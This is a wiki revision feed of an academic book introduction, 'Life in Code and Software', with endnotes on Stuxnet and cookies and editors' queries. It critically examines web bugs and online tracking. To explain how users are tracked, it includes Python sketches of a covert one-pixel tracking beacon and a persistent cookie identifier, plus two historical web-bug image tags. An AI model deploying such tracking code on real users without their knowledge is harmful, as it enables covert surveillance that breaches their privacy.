Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs) and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered a sub-class of virus. Worms spread from computer to computer, often across networks, but unlike a virus a worm can transfer itself without any human action: it exploits a computer's file or information transport features, such as its networking facilities, to travel between machines unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code disassembled from the worm and careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, Ralph Langner then matched this against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad; careful analysis of background images accidentally photographed on computers used by the president confirmed the importance of the cascade structure, centrifuge layout and the enriching process, see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (see Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.), although there is suspicion that there may have been three versions of the Stuxnet code: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are some criticisms that this link may be spurious; for instance, Cryptome (2010) argues: 'It may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit.' &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post. I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier. I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] The notion of actant in 'computational actants' is drawn from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4705</id>
		<title>Life in Code and Software/Introduction</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Life_in_Code_and_Software/Introduction&amp;diff=4705"/>
		<updated>2012-04-18T14:12:45Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[http://www.livingbooksaboutlife.org/books/Life_in_Code_and_Software Back to the book] &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
This book explores the relationship between living, code and software. Technologies of code and software increasingly make up an important part of our urban environment. Indeed, their reach stretches to even quite remote areas of the world. ''Life in Code and Software'' introduces and explores the way in which code and software are becoming the conditions of possibility for human living, crucially forming a computational ecology that we inhabit. As such, we need to take account of this new computational environment and think about how today we live in a highly mediated, code-based world. [Eds: Is there a slippage here from a situation where code and software are 'important', to one in which they form the actual basis of our world, constituting the possibility of human life? Does something need to be said here about the extent to which code and software can be privileged in this respect? For example, why can they be said to constitute the conditions for human living over and above any of the other possible candidates for this role: air, the economy, evolution, the environment, satellites and so on?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Certainly, computer code and software are not merely mechanisms; they represent an extremely rich form of media. They differ from previous instantiations of media in that they are highly processual. They can also have agency delegated to them, which they can then prescribe back onto other actors, but which it also remains within the purview of humans to seek to understand. As Kitchin argues:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;across a diverse set of everyday tasks, domestic chores, work, shopping, travelling, communicating, governing, and policing, software makes a difference to how social, spatial, and economic life takes place. Such is software's capacities and growing pervasiveness that some analysts predict that we are entering a new phase of ‘everyware’ (Greenfield, 2006); that is, computational power will be distributed and available at any point on the planet. (Kitchin, 2011: 945)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; This deeply interactive characteristic of code and software makes computational media highly plastic for use in everyday life, and as such it has inevitably [Eds: is its penetration really 'inevitable'?] penetrated more and more into the lifeworld. This has created, and continues to create, specific tensions in relation to old media forms [Eds: should an example be provided of such a tension?], as well as problems for managing and spectacularising the relations of the public to the entertainment industry and politics. This is something that relates to the interests of the previous century’s critical theorists, particularly their concern with the liquidation of individuality and the homogenization of culture. Nonetheless, there is also held to be a radical, if not revolutionary kernel within the softwarization project. This [Eds: this is the fourth sentence in this paragraph to begin with 'This'] is a result of the relative affordance code/software appears to provide for autonomous individuals within networks of association to share information and communicate. Indeed, as Deuze ''et al ''have argued:&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Considering the current opportunity a media life gives people to create multiple versions of themselves and others, and to endlessly redact themselves (as someone does with his/her profile on an online dating site in order to produce better matches), we now have entered a time where… we can in fact see ourselves live, become cognizant about how our lifeworld is 'a world of artifice, of bending, adapting, of fiction, vanity, a world that has meaning and value only for the man who is its deviser' [Pirandello 1990,&amp;amp;nbsp;39]. But this is not an atomized, fragmented, and depressing world, or it does not have to be such a world. (Deuze, Blank, and Speers, 2012)&amp;lt;br&amp;gt; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; I want to understand the 'ecology' in 'computational ecology' here as a broad concept related to the environmental habitus of both human and non-human actors. My aim in doing so is to explore changes that are made possible by the installation of code/software via computational devices, streams, clouds, or networks. This is what Mitcham calls a ‘new ecology of artifice’ (1998: 43). The proliferation of contrivances that are computationally based is truly breathtaking - each year we are provided with fresh statistics that demonstrate just how profound the new computational world is. [Eds: should some examples of such statistics be provided?] These computationally based devices, of course, are not static, nor are they mute, and their interconnections, communications, operation, effects and usage remain to be properly studied. It is a task that is made all the more difficult: both by the staggering rate of change, thanks to the underlying hardware technologies, which are becoming ever smaller, more compact, more powerful and less power-hungry; and by the increasing complexity, power, range and intelligence of the software that powers them. &lt;br /&gt;
&lt;br /&gt;
They [Eds: what does this 'they' refer to? Can it be clarified?] also enable the assemblage of the new social ontologies and the corresponding social epistemologies that we have increasingly come to take for granted in computational society, including Wikipedia, Facebook, and Twitter. The extent to which computational devices, and the computational principles on which they are based and from which they draw their power, have permeated the way we use and develop knowledges in everyday life is simply breathtaking [Eds: is this not repeating the 'breathtaking' claim of the previous paragraph?], if we had not already discounted and backgrounded its importance. The ability to call up information instantly from a mobile device, combine it with others, subject it to debate and critique through real-time social networks, and then edit, post and distribute it worldwide would be incredible if it hadn’t become so mundane. &lt;br /&gt;
&lt;br /&gt;
Today it should hardly come as a surprise that code/software lies as a mediator between ourselves and our corporeal experiences [Eds: Above the claim was made that code/software are the conditions of possibility of human life. How, then, can they mediate between us and our experiences if they are what makes 'us' possible? Do they constitute us and our world; do they mediate between us and the world; or do they do both? Does all this need clarifying?], disconnecting the physical world from a direct coupling with our physicality, whilst managing a looser softwarized transmission system. Called ‘fly-by-wire’ in aircraft design, in reality fly-by-wire is the condition of the computational environment we increasingly experience, which I elsewhere term ''computationality'' (Berry, 2011). This is a highly mediated existence and has been a growing feature of the (post) modern world. Whilst many objects remain firmly material and within our grasp, it is easy to see how a more softwarized simulacrum lies just beyond the horizon. Not that software isn’t material, of course. Certainly, it is embedded in physical objects and the physical environment and requires a material carrier to function at all. Nonetheless, the materiality of software is without a doubt ''differently'' material, more ''tenuously'' material, almost less ''materially material''. [Eds: less material than what? Does this need to be explained?] This is partly, it has to be said, due to software’s increasing tendency to hide its depths behind glass rectangles which yield only to certain prescribed forms of touch-based interfaces. Here I am thinking both of physical keyboards and trackpads, as much as haptic touch interfaces, like those found in the iPad and other tablet computers. Another way of putting this, as N. Katherine Hayles (2004) has accurately observed, is that print is flat and code is deep. [Eds: At least one of those contained in your book here, F. Frabetti, creates problems for this idea of Hayles' and its too simplistic understanding of code, print, and materiality. Is this something that should be referenced and commented upon?]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
== '''Web Bugs, Beacons, and Trackers'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Some examples will help to demonstrate how this code-based world is increasingly being spun around us. Firstly, we might consider the growing phenomenon of what are called ‘web bugs’ (also known as ‘web beacons’); that is, computer programming code that is embedded in seemingly benign surfaces, but which is actively and covertly collecting data and information about us.[1] As Madrigal explains: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;This morning, if you opened your browser and went to NYTimes.com, an amazing thing happened in the milliseconds between your click and when the news about North Korea and James Murdoch appeared on your screen. Data from this single visit was sent to 10 different companies, including Microsoft and Google subsidiaries, a gaggle of traffic-logging sites, and other, smaller ad firms. Nearly instantaneously, these companies can log your visit, place ads tailored for your eyes specifically, and add to the ever-growing online file about you… the list of companies that tracked my movements on the Internet in one recent 36-hour period of standard web surfing: Acerno. Adara Media. Adblade. Adbrite. ADC Onion. Adchemy. ADiFY. AdMeld. Adtech. Aggregate Knowledge. AlmondNet. Aperture. AppNexus. Atlas. Audience Science… And that's just the As. My complete list includes 105 companies, and there are dozens more than that in existence. (Madrigal, 2012).&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt;&amp;lt;blockquote&amp;gt;&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; Web bugs are automated data collection agents that are secretly included in the web pages that we browse. Often held within a tiny one-pixel frame or image, which is therefore far too small for the naked eye to see, they execute code to secrete cookies onto your computer so that they can track user behavior, but also [Eds: use 'and' instead of 'but also' as these acts are not that different?] send various information about the user back to their servers. &lt;br /&gt;
&lt;br /&gt;
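To make the mechanics concrete, the following is a minimal sketch of what the server side of such a one-pixel beacon might look like; the endpoint and logged fields are invented for illustration rather than taken from any particular company's code. The server returns a transparent 1x1 GIF whilst quietly recording the metadata that accompanies every image request: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Hypothetical sketch of a tracking 'pixel' endpoint: it serves a 1x1 GIF
# and logs the metadata the browser volunteers with every image request.
from wsgiref.simple_server import make_server

# Smallest valid transparent GIF (43 bytes).
PIXEL = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
         b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01"
         b"\x00\x00\x02\x02D\x01\x00;")

def beacon(environ, start_response):
    # Everything here arrives without any visible action by the user.
    record = {
        "ip": environ.get("REMOTE_ADDR"),
        "page": environ.get("HTTP_REFERER"),    # the page embedding the pixel
        "browser": environ.get("HTTP_USER_AGENT"),
        "cookie": environ.get("HTTP_COOKIE"),   # any previously set tracking ID
    }
    print(record)  # a real tracker would write this to a datastore
    start_response("200 OK", [("Content-Type", "image/gif"),
                              ("Content-Length", str(len(PIXEL)))])
    return [PIXEL]

if __name__ == "__main__":
    make_server("", 8000, beacon).serve_forever()
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;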
Originally designed as ‘HTTP state management mechanisms’ in the early 1990s, these data storage processes were intended to enable webpages and sites to store the current collection of data about a user, or what is called ‘State’ in computer science. Known as ‘web bugs for web 1.0’ (Dobias, 2010: 245), they were aimed at allowing website designers to implement some element of memory about a user, such as a current shopping basket, preferences, or username. It was a small step for companies to see the potential of monitoring user behaviour by leaving tracking information about browsing, purchasing and clicking behaviour through the use of these early ‘cookies’.[2] The ability of algorithms to track behaviour, and to collect data and information about users, raises important privacy concerns, but it also facilitates the rise of so-called behavioural marketing and nudges (for a behaviourist approach see Eyal, 2012). These technologies have become much more sophisticated in the light of Web 2.0 technologies and developments in hardware and software: in effect, web bugs for web 2.0 (Dobias, 2010: 245). &lt;br /&gt;
&lt;br /&gt;
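Very little machinery is needed to turn this state management into tracking. As a minimal sketch, using only the Python standard library, a server might mint a persistent identifier for each new visitor as follows; the cookie name and one-year lifetime are invented for the example, but the Set-Cookie mechanics follow the pattern Mittal (2010) describes: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Sketch of cookie-based 'state management' used for tracking: the server
# assigns a random ID once, and the browser returns it on every later visit.
import uuid
from http import cookies

def tracking_header(existing_cookie_header):
    """Return (uid, Set-Cookie header or None) for an incoming request."""
    jar = cookies.SimpleCookie(existing_cookie_header or "")
    if "uid" in jar:
        return jar["uid"].value, None        # known visitor: nothing to set
    uid = uuid.uuid4().hex                   # new visitor: mint an identifier
    jar["uid"] = uid
    jar["uid"]["max-age"] = 60 * 60 * 24 * 365   # persist for a year
    jar["uid"]["path"] = "/"
    return uid, jar["uid"].OutputString()

uid, header = tracking_header(None)
print(uid, "Set-Cookie:", header)
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;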
Fortunately, we are seeing the creation of a number of useful software projects to allow us to track the trackers: Collusion, Foxtracks and Ghostery, for example.[3] If we look at the Ghostery log for the [http://chartbeat.com/ ChartBeat company], it is described as: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;Provid[ing] real-time analytics to web sites and blogs. The interface tracks visitors, load times, and referring sites on a minute-by-minute basis. This allows real-time engagement with users giving publishers an opportunity to respond to social media events as they happen. ChartBeat also supports mobile technology through APIs. (Ghostery, 2012b)&amp;amp;nbsp; &amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Web bugs perform these analytics by running code in the browser without the knowledge of the user; should this code be observed, it looks extremely complicated.[4] Here are two early web bugs (web 1.0) collected by the Electronic Frontier Foundation (EFF) (1999): &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&amp;lt;blockquote&amp;gt;&lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;img src=&amp;quot;http://ad.doubleclick.net/ad/pixel.quicken/NEW&amp;quot; width=1 height=1 border=0&amp;amp;gt;&amp;lt;/pre&amp;gt; &lt;br /&gt;
*&amp;lt;pre&amp;gt;&amp;amp;lt;IMG WIDTH=1 HEIGHT=1 border=0 SRC=&amp;quot;http://media.preferences.com/ping?ML_SD=IntuitTE_Intuit_1x1_RunOfSite_Any&amp;amp;amp;db_afcr=4B31-C2FB-10E2C&amp;amp;amp;event=reghome&amp;amp;amp;group=register&amp;amp;amp;time=1999.10.27.20.56.37&amp;quot;&amp;amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;/blockquote&amp;gt; &lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Later web bugs (web 2.0) are not included here due to the complexity and length of the code (but see the 3rd-party elements, or ‘3pes’, at http://www.knowyourelements.com/ ).[5] It is noticeable that this code is extremely opaque and difficult to understand, even for experienced computer programmers. Indeed, one suspects an element of obfuscation, a programming technique to reduce the readability of the code in order to shield the company from observation. So far, in checking a number of web bugs on a variety of websites, I have been unable to find one that supplies any commentary on what exactly the code is doing, beyond a short privacy policy statement. Again Ghostery (2012b) usefully supplies us with some general information on this web bug, such as the fact that it has been found on over 100,000 websites across the Internet, and that the data collected is 'anonymous (browser type), pseudonymous (IP address)'; the data is not shared with third parties, but no information is given on data retention policies. As of 2nd March, 2012, Ghostery reported that it was tracking 829 different web bugs across the Internet. This is a relatively unregulated market in user behavior, tracking and data collection, which currently has a number of self-regulatory bodies, such as the Network Advertising Initiative (NAI). As Madrigal reports: 'In essence, [the NAI] argued that users do not have the right to *not* be tracked. &amp;quot;We've long recognized that consumers should be provided a choice about whether data about their likely interests can be used to make their ads more relevant,&amp;quot; [they] wrote. &amp;quot;But the NAI code also recognizes that companies sometimes need to continue to collect data for operational reasons that are separate from ad targeting based on a user's online behavior.&amp;quot;… Companies &amp;quot;need to continue to collect data,&amp;quot; but that contrasts directly with users desire &amp;quot;not to be tracked.&amp;quot;' (Madrigal, 2012). [Eds: please check that the single and double quotation marks here are correct]&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
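Even without such tools, a crude form of tracking the trackers can be performed by hand: fetch a page and list the third-party hosts from which its scripts, images and iframes are loaded, since these external elements are where web bugs typically live. A sketch, with a placeholder target URL: &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;
# Rough sketch: list the third-party hosts that a page loads elements from.
from html.parser import HTMLParser
from urllib.parse import urlparse
from urllib.request import urlopen

class ElementCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.hosts = set()
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "img", "iframe"):
            host = urlparse(dict(attrs).get("src") or "").netloc
            if host:
                self.hosts.add(host)

page = "http://www.example.com/"        # placeholder page to inspect
parser = ElementCollector()
parser.feed(urlopen(page).read().decode("utf-8", "replace"))
for host in sorted(parser.hosts - {urlparse(page).netloc}):
    print("third-party element host:", host)
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;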
&amp;lt;br&amp;gt; These web bugs, beacons, pixels, and tags, as they are variously called, form part of the dark-net surveillance network that users rarely see, even though it is profoundly changing their experience of the internet in real-time by attempting to second guess, tempt, direct and nudge behavior in particular directions. Ghostery ranked the web bugs in 2010 and identified the following as the most frequently encountered (above average): Revenue Science (250x), OpenX (254x), AddThis (523.6x), Facebook Connect (529.8x), Omniture (605.7x), Comscore Beacon (659.5x), DoubleClick (924.4x), QuantCast (1042x), Google Adsense (1452x), Google Analytics (3904.5x) (Ghostery, 2011). As can be seen in terms of relative size of encounter, Google is clearly the biggest player by a long distance in the area of user statistics collection. This data is important because, as JP Morgan's Imran Khan explained, a unique visitor is worth $189 at [http://www.businessinsider.com/blackboard/amazon Amazon] (e-commerce) and $24 at [http://www.businessinsider.com/blackboard/google Google] (search), and although Facebook (social networking) is only generating $4 per user, this is a rapidly growing number (Yarrow, 2011). Keeping and holding these visitors, through real-time analytics, customer history, behavioural targeting, etc. is increasingly becoming extremely profitable. Ghostery (2010) has performed a useful analysis of their web bug database that attempts to categorise the web bugs found into 16 different types, which I have re-categorised into four main types: (1) Advertiser/Marketing Services, (2) Analysis/Research Services, (3) Management Platforms, (4) Verification/Privacy Services: &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
1. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Advertiser/Marketing Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Advertiser: A company sponsoring advertisement and ultimately responsible for the message delivered to the consumer. Example: [http://www.att.com/ AT&amp;amp;amp;T] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Exchange: A provider of marketplace connecting advertisers to ad networks and data aggregators (online and off), often facilitating multiple connections and bidding processes. Example: [http://www.rightmedia.com/ Right Media]&amp;amp;nbsp; &amp;amp;nbsp; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Network: A broker and often technology provider connecting advertisers and publishers (web site operators). Example: [http://www.burstmedia.com/ Burst Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Publisher: Website operator who displays ads for advertiser(s) in various types of campaigns. Example: [http://www.nytimes.com/ The New York Times]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
2. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Analysis/Research Services''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Online Data Aggregator: Collects data from online publishers and provides it to advertisers either directly or via exchange. Example: [http://www.bluekai.com/ BlueKai] &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Offline Data Aggregator: Collects data from a range of offline sources and provides data to advertisers directly or via exchange. Example: [http://www.experian.com/ Experian] &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Optimizer: Provider of analytics technology and services for ROI assessment and content optimization purposes. Example: [http://www.roilabs.com/ ROILabs] &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Research: Collects data for market research purposes where no ads are serviced through this data. Example: [http://www.safecount.net/ Safecount] &lt;br /&gt;
*e.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Analytics Provider: Provider of cross-platform statistical analysis to understand market effectiveness and audience segmentation. Example: [http://www.google.com/analytics/ Google Analytics] &lt;br /&gt;
*f.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Retargeter: Providers of technologies that allow publishers to identify their visitors when they place ads on third-party sites. Example: [http://www.fetchback.com/ Fetchback]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
3. &amp;amp;nbsp; &amp;amp;nbsp; &amp;amp;nbsp; '''Management Platforms''': &lt;br /&gt;
&lt;br /&gt;
*a.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Demand-Side Platform: A technology provider that allows marketers to buy inventory across multiple platforms or exchanges. DSPs often layer in custom optimization, audience targeting, real-time bidding and other services. Example: [http://www.invitemedia.com/ Invite Media]&amp;lt;br&amp;gt; &lt;br /&gt;
*b.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Supply-Side Platform: A technology provider that allows publishers to access advertiser demand across multiple platforms or exchanges.&amp;amp;nbsp; SSPs often layer in custom yield optimization, audience creation, real-time bidding and other services. Example: [http://www.admeld.com/ AdMeld]&amp;lt;br&amp;gt; &lt;br /&gt;
*c.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Ad Server: Technology that delivers and tracks advertisements independently of the web site where the ad is being displayed. Example: [http://www.doubleclick.com/ DoubleClick DART]&amp;lt;br&amp;gt; &lt;br /&gt;
*d.&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp;&amp;amp;nbsp; Agency: Provider of creative and buying services (both audience and data) for advertisers. Example: [http://www.mediacom.com/en/home.aspx MediaCom]&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
